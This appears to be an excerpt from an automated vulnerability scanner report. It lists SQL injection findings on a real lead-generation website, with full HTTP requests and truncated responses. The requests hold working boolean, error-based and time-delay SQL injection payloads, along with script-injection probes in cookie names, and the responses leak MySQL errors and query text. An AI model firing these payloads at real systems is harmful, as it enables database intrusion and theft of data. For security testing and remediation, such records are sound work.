The attributeId_342_g parameter appears to be vulnerable to SQL injection attacks. The payloads 20219497'%20or%201%3d1--%20 and 20219497'%20or%201%3d2--%20 were each submitted in the attributeId_342_g parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance20219497'%20or%201%3d1--%20&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433='%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C'&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A6240CD3E62E72A7A802AF6565414F2D; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:37:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=uen32g3vfhfivntuav244d95q2; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title>
   <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/>
   <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 8    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Block">
       <div id="lending_headern">
       <table width="900" border="0" cellspacing="0" cellpadding="0">
       <tr
...[SNIP]...

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance20219497'%20or%201%3d2--%20&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433='%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C'&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A6240CD3E62E72A7A802AF6565414F2D; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:37:41 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=02g1g9bmd3mp5n4l16s07qapj3; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61840


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Business Loans, Use InsideUp to Get Quotes and Compare Business Loan Providers </title>
   <meta name="description" content="Let business loan providers compete for your loan needs. Compare local and national business loan companies."/>
   <meta name="keywords" content=" Business Loans "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 15    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9, #step_10, #step_11, #step_12, #step_13, #step_14, #step_15, #step_16,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Block">
       <div id="lending_headern">
       <table width="900" border="0" cellspacing="0" cellpadding="0">
       <tr>
            <td width="175" vali
...[SNIP]...

1.20. http://www.insideup.com/ppc/leadflow/bulo00/project.php [attributeId_343_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The attributeId_343_g parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_343_g parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9'&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=SELECT%20pg_sleep(25)--&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=oe59si9cceia3avrh9tdjp5lr2; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:21:51 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8326


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
rcard&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'loan&attributeId_430=2792__$15,000 - 24,999&attributeId_431=2801__A business tha' at line 5

1.21. http://www.insideup.com/ppc/leadflow/bulo00/project.php [attributeId_343_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The attributeId_343_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_343_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9'&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:42:00 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10118


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'loan&attributeId_430=2792__$15,000 - 24,999&attributeId_431=2801__A business tha' at line 5

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9''&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
